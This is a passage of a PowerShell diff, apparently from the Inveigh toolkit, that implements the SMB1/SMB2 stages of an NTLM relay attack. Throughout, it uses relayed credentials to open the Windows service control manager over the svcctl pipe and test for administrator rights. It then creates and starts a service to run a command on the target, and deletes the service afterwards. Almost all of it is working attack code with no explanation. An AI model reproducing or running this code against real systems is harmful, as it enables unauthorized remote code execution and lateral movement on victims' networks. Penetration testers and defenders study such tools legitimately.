+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service deleted on $Target") > $null
+ }
+ else
+ {
+ $SMB_client_stage = 'CloseRequest'
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
+ }
+
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+
+ 'CloseRequest'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBCloseRequest 0x00,0x40
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ 'TreeDisconnect'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBTreeDisconnectRequest
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Logoff'
+ }
+
+ 'Logoff'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBLogoffAndXRequest
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ if($SMB_relay_failed)
+ {
+ $SMB_client_stage = 'Exit'
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay failed on $Target") > $null
+ }
+
+ }
+
+ }
+ else
+ {
+
+ $SMB_client_stage = 'TreeConnect'
+
+ :SMB_execute_loop while ($SMB_client_stage -ne 'exit')
+ {
+
+ switch ($SMB_client_stage)
+ {
+
+ 'TreeConnect'
+ {
+ $SMB2_message_ID = 4
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'CreateRequest'
+ }
+
+ 'CreateRequest'
+ {
+ $SMB2_tree_ID = 0x01,0x00,0x00,0x00
+ $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes
+ $packet_SMB2_data["Share_Access"] = 0x07,0x00,0x00,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'RPCBind'
+ }
+
+ 'RPCBind'
+ {
+ $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'OpenSCManagerW'
+ }
+
+ 'ReadRequest'
+ {
+
+ Start-Sleep -m 150
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditCharge"] = 0x10,0x00
+ $packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+ else
+ {
+ $SMB_client_stage = 'StatusPending'
+ }
+
+ }
+
+ 'StatusPending'
+ {
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+
+ }
+
+ 'OpenSCManagerW'
+ {
+ $SMB2_message_ID = 30
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'CheckAccess'
+ }
+
+ 'CheckAccess'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[108..127]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
+ {
+ $SMB_service_manager_context_handle = $SMB_client_receive[108..127]
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has required privilege on $Target") > $null
+
+ if($Attack -eq 'Session')
+ {
+ $SMB_administrator = $true
+ $SMB_close_service_handle_stage = 2
+ $SMB2_message_ID += 19
+ $SMB_client_stage = 'CloseServiceHandle'
+ }
+ elseif($SCM_data.Length -lt $SMB_split_index)
+ {
+ $SMB_client_stage = 'CreateServiceW'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_First'
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00')
+ {
+
+ if($HTTP_NTLM_domain_string -ne '')
+ {
+ $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target")
+ }
+
+ if(!$inveigh.relay_list.Contains("$HTTP_source_IP $Target"))
+ {
+ $inveigh.relay_list.Add("$HTTP_source_IP $Target")
+ }
+
+ if($Attack -ne 'Session')
+ {
+ $SMB_relay_failed = $true
+ $inveigh.relay_list.Add("0 $HTTP_source_IP $HTTP_username_full $Target")
+ }
+
+ $inveigh.output_queue.Add("[!] $(Get-Date -format s) $HTTP_username_full does not have required privilege on $Target") > $null
+ $SMB_service_manager_context_handle = $SMB_client_receive[108..127]
+ $SMB_close_service_handle_stage = 2
+ $SMB2_message_ID += 19
+ $SMB_client_stage = 'CloseServiceHandle'
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'CreateServiceW'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'CreateServiceW_First'
+ {
+ $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
+ $SMB2_message_ID += 20
+ $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
+ $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
+ $SMB_split_index_tracker = $SMB_split_index
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage_final -le 2)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_split_stage = 2
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Middle'
+ {
+ $SMB_split_stage++
+ $SMB2_message_ID++
+ $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
+ $SMB_split_index_tracker += $SMB_split_index
+ $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage -ge $SMB_split_stage_final)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Last'
+ {
+ $SMB2_message_ID++
+ $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
+ $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'StartServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '00-00-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service created on $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute command on $Target") > $null
+ $SMB_service_context_handle = $SMB_client_receive[112..131]
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'DeleteServiceW'
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00')
+ {
+ $inveigh.console_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service creation failed on $Target") > $null
+ $SMB_relay_failed = $true
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'DeleteServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '1d-04-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] command executed on $Target") > $null
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '02-00-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service failed to start on $Target") > $null
+ }
+
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'CloseServiceHandle'
+ $SMB_close_service_handle_stage = 1
+ }
+
+ 'CloseServiceHandle'
+ {
+
+ if($SMB_close_service_handle_stage -eq 1)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service deleted on $Target") > $null
+ $SMB2_message_ID += 20
+ $SMB_close_service_handle_stage++
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
+ }
+ else
+ {
+ $SMB2_message_ID++
+ $SMB_client_stage = 'CloseRequest'
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
+ }
+
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+
+ 'CloseRequest'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2CloseRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ 'TreeDisconnect'
+ {
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($Attack -eq 'Session')
+ {
+ $inveigh.session_message_ID_table[$inveigh.session_count] = $SMB2_message_ID
+ $SMB_client_stage = 'Exit'
+ }
+ else
+ {
+ $SMB_client_stage = 'Logoff'
+ }
+
+ }
+
+ 'Logoff'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2SessionLogoffRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ if($SMB_relay_failed -and $Attack -ne 'Session')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay failed on $Target") > $null
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ }
+
+ if(!$SMB_relay_failed -and $RelayAutoDisable -eq 'Y' -and $inveigh.target_list.Count -eq 1 -and $Attack -ne 'Session')
